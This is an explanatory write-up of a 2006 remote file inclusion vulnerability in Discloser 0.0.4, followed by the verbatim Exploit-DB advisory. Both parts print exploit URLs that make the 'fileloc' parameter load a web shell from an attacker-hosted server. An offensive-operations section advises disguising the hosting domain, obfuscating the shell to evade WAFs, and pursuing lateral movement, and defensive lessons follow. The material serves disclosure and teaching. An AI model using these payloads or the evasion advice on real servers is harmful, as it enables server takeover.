Discloser 0.0.4 'fileloc' Remote File Inclusion Explained

What this paper is

This paper describes a Remote File Inclusion (RFI) vulnerability found in Discloser version 0.0.4. RFI vulnerabilities allow an attacker to trick a web application into including and executing code from a remote server, rather than a local file. In this case, the fileloc parameter in certain PHP files within Discloser is susceptible to this attack.

Simple technical breakdown

Discloser is a PHP web application. PHP has a feature that allows it to include the content of one file into another using functions like include or require. When a web application uses user-supplied input (like a URL parameter) directly in these include functions without proper validation, an attacker can provide a URL pointing to a malicious file on a server they control. The vulnerable PHP script then fetches and executes the code from that remote file, effectively giving the attacker control over the web server.

The vulnerability lies in how the fileloc parameter is handled. If the application doesn't check if fileloc points to a local file or a remote URL, it can be exploited.

Complete code and payload walkthrough

The provided paper snippet does not contain any actual code or payload bytes. It only describes the vulnerability and provides example exploit URLs.

Here's a breakdown of the exploit URL structure:

• http://[Target]/[Path]/content/content.php?fileloc=http://www.evalsite.com/shell.php?
• http://[Target]/[Path]/inc/indexhead.php?fileloc= http://www.evalsite.com/shell.php?

Explanation of the exploit URL components:

• http://[Target]/[Path]/: This represents the vulnerable Discloser installation on the target web server.
  • [Target]: The IP address or hostname of the victim server.
  • [Path]: The directory path where Discloser is installed on the web server.
• content/content.php or inc/indexhead.php: These are specific PHP files within the Discloser application that are vulnerable. The vulnerability is likely due to these files using the fileloc parameter in an include or require statement.
• ?fileloc=: This is the parameter that is being exploited. The application expects a local file path here.
• http://www.evalsite.com/shell.php?: This is the attacker-controlled remote URL.
  • http://www.evalsite.com/: The attacker's server hosting the malicious payload.
  • shell.php: A PHP file on the attacker's server containing malicious code, typically a web shell.
  • ?: The question mark at the end is often used to terminate the parameter value, ensuring that any subsequent parameters in the original request are not misinterpreted.

Mapping:

• fileloc parameter -> Input point for the RFI vulnerability.
• http://www.evalsite.com/shell.php? -> Remote URL containing the attacker's payload.
• content.php / indexhead.php -> Vulnerable PHP scripts that process the fileloc parameter.

Shellcode/Payload: The paper does not provide specific shellcode. However, in a typical RFI attack of this nature, shell.php would contain PHP code that creates a web shell. A common web shell allows an attacker to execute arbitrary commands on the server through a web interface.

Practical details for offensive operations teams

• Required Access Level: Network access to the target web server is required. No local access or administrative privileges are needed on the target initially.
• Lab Preconditions:
  • A controlled web server to host the malicious shell.php file. This server should be accessible from the target.
  • A Discloser 0.0.4 installation (or a similarly vulnerable version) for testing and reconnaissance.
  • Knowledge of the target web server's directory structure to locate the Discloser installation and identify potential vulnerable paths.
• Tooling Assumptions:
  • A web browser for crafting and sending requests.
  • A simple HTTP server (e.g., Python's SimpleHTTPServer, Apache) to host the shell.php payload.
  • A text editor for creating the shell.php file.
  • Network scanning tools (e.g., Nmap) to identify web servers and potential Discloser installations.
• Execution Pitfalls:
  • Firewall/WAF Blocking: The target's firewall or Web Application Firewall (WAF) might block requests to external URLs or detect the malicious payload.
  • PHP Configuration: The target server's PHP configuration might have allow_url_fopen or allow_url_include disabled, which are necessary for RFI to work.
  • Path Guessing: The attacker needs to correctly guess the [Path] to the Discloser installation.
  • Payload Detection: Antivirus or intrusion detection systems on the target might detect the web shell code once it's executed.
  • URL Encoding: Special characters in the URL might need encoding.
  • Null Bytes: In some older PHP versions, null bytes (%00) could be used to truncate file paths, but this is less common for RFI.
• Tradecraft Considerations:
  • Reconnaissance: Thoroughly scan the target for web applications and identify potential Discloser installations. Look for common installation paths.
  • Payload Hosting: Host the shell.php on a reliable and less suspicious domain if possible. Consider using a domain that appears legitimate.
  • Obfuscation: If the WAF is aggressive, consider basic obfuscation techniques for the shell.php content, though this paper doesn't suggest it.
  • Post-Exploitation: Once a web shell is achieved, focus on privilege escalation and lateral movement if permitted by the engagement scope.

Where this was used and when

This vulnerability was disclosed in 2006. At that time, PHP web applications were prevalent, and RFI was a common and effective attack vector. Discloser was likely used by individuals or organizations for content management or similar web-based functionalities. Exploits of this nature were frequently found in various PHP applications and CMS platforms during this era.

Defensive lessons for modern teams

• Input Validation is Crucial: Never trust user input. Always validate and sanitize any data that is used in file operations, database queries, or system commands.
• Disable allow_url_fopen and allow_url_include: For most web applications, these PHP directives should be disabled in php.ini unless absolutely necessary for specific, controlled functionalities.
• Use Whitelisting: Instead of trying to block bad inputs, define what good inputs look like. For file inclusions, maintain a strict list of allowed local files.
• Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common RFI patterns. Keep WAF rules updated.
• Regular Patching and Updates: Ensure all web applications and their dependencies (like PHP itself) are kept up-to-date with the latest security patches.
• Secure Coding Practices: Train developers on secure coding principles, including the dangers of insecure file handling and the importance of input validation.
• Least Privilege: Run web servers and applications with the minimum necessary privileges to limit the impact of a successful compromise.

ASCII visual (if applicable)

This vulnerability is a direct interaction between the web server and an external resource, so a simple flow diagram is applicable.

+-----------------+       +------------------------+       +---------------------+
| Attacker's      | ----> | Target Web Server      | ----> | Attacker's          |
| Browser         |       | (Vulnerable Discloser) |       | Hosting Server      |
+-----------------+       +------------------------+       +---------------------+
        |                         |
        | 1. Sends crafted GET    | 3. Includes remote file
        |    request with         |    (shell.php)
        |    fileloc=http://...   |
        |                         |
        |                         | 4. Executes code from shell.php
        |                         |    (e.g., web shell commands)
        |                         |
        |                         | 5. Sends response back to
        |                         |    attacker's browser
        |                         |
        +-------------------------+

Source references

• Paper ID: 2188
• Paper Title: Discloser 0.0.4 - 'fileloc' Remote File Inclusion
• Author: Arash RJ
• Published: 2006-08-15
• Keywords: PHP, webapps
• Paper URL: https://www.exploit-db.com/papers/2188
• Raw URL: https://www.exploit-db.com/raw/2188

Original Exploit-DB Content (Verbatim)

|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
| discloser 0.0.4 Remote File Inclusion Vulnerability
|
| Download: http://optusnet.dl.sourceforge.net/sourceforge/discloser/discloser-0.0.4.tar.gz
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|Contact|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
| Discoverd by: Arash RJ
|
| Team: PersianFox Digital Security Team
|
| URL: http://www.PersianFox.com
|
| E-Mail: arashrj@gmail.com
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|Exploit|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
| http://[Target]/[Path]/content/content.php?fileloc=http://www.evalsite.com/shell.php?
|
| http://[Target]/[Path]/inc/indexhead.php?fileloc= http://www.evalsite.com/shell.php?
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|

# milw0rm.com [2006-08-15]